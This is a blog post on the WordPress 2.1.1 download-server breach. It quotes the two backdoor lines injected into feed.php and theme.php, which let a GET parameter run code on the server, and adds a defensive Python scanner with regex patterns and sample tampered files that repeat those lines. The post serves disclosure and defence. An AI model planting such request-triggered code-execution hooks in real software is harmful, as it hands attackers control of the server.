Serious Wordpress Security Hole in v2.1.1

Someone cracked the WordPress servers and inserted malicious code into two of the source files of the popular open source blog software.

If you are running WordPress v2.1.1 you need to upgrade now! Read their announcement here. This is more serious than the normal round of 'someone found another way to exploit sloppy PHP code' — someone was able to gain access to their download server, insert code and recreate the distribution file.

They have never had any kind of file integrity checking (GPG signatures are common practice in open source projects), but I think it is high time they implemented it.

They are a bit light on details of the inserted code. It exists in two files, feed.php and theme.php. Someone inserted this line into feed.php:
if ($_GET["ix"]) { comment_text_phpfilter($_GET["ix"]); }

And in theme.php:
if ($_GET["iz"]) { get_theme_mcommand($_GET["iz"]); }

What this means is that anyone passing the argument ix to feed.php or iz to theme.php could execute PHP code or shell commands on the server with the permissions of the web server process. It is as if you opened up a guest account on your system for anyone to use. It could be used to launch spam relays, potentially exploit other security holes to gain root access, or trash your blog.
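As an added example (not code from the original post or from WordPress), here is a small defender-side check for the two things this incident calls for: scanning an install for the injected lines quoted above, and comparing file digests against a trusted manifest, which stands in for the signed release checksums the post argues for. The sample file bodies and the manifest are constructed here for illustration.

```python
import hashlib
import re

# Signatures for the two lines reported as injected into the 2.1.1 tarball.
BACKDOOR_PATTERNS = {
    "feed.php backdoor": re.compile(
        r'comment_text_phpfilter\s*\(\s*\$_GET\s*\[\s*["\']ix["\']\s*\]\s*\)'),
    "theme.php backdoor": re.compile(
        r'get_theme_mcommand\s*\(\s*\$_GET\s*\[\s*["\']iz["\']\s*\]\s*\)'),
}
# Broader check: either injected helper called with any request parameter.
GENERIC_PATTERN = re.compile(
    r'(comment_text_phpfilter|get_theme_mcommand)\s*\(\s*\$_(GET|POST|REQUEST)\b')

def scan_php_source(name, source):
    """Return (file, line_no, label) findings for one PHP file's text."""
    findings = []
    for line_no, line in enumerate(source.splitlines(), start=1):
        for label, pattern in BACKDOOR_PATTERNS.items():
            if pattern.search(line):
                findings.append((name, line_no, label))
                break
        else:
            if GENERIC_PATTERN.search(line):
                findings.append((name, line_no, "injected helper fed request input"))
    return findings

def verify_against_manifest(files, manifest):
    """Names whose sha256 differs from the trusted manifest (or are absent from it)."""
    bad = []
    for name, body in files.items():
        digest = hashlib.sha256(body.encode()).hexdigest()
        if manifest.get(name) != digest:
            bad.append(name)
    return sorted(bad)

# Constructed sample files: clean stand-ins and the same files with the lines appended.
CLEAN = {
    "wp-includes/feed.php": "<?php\nfunction get_bloginfo_rss($show = '') {\n  return get_bloginfo($show);\n}\n",
    "wp-includes/theme.php": "<?php\nfunction get_stylesheet() {\n  return get_option('stylesheet');\n}\n",
}
TAMPERED = {
    "wp-includes/feed.php": CLEAN["wp-includes/feed.php"] + 'if ($_GET["ix"]) { comment_text_phpfilter($_GET["ix"]); }\n',
    "wp-includes/theme.php": CLEAN["wp-includes/theme.php"] + 'if ($_GET["iz"]) { get_theme_mcommand($_GET["iz"]); }\n',
}
TRUSTED_MANIFEST = {n: hashlib.sha256(b.encode()).hexdigest() for n, b in CLEAN.items()}

if __name__ == "__main__":
    for name, body in TAMPERED.items():
        print(scan_php_source(name, body), verify_against_manifest({name: body}, TRUSTED_MANIFEST))
```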

The WordPress team needs to take a very serious look at their development process and security procedures. At the least they need to designate someone as the release manager and have them GPG sign the release files, so that those of us downloading their software have some level of confidence that it hasn't been compromised.
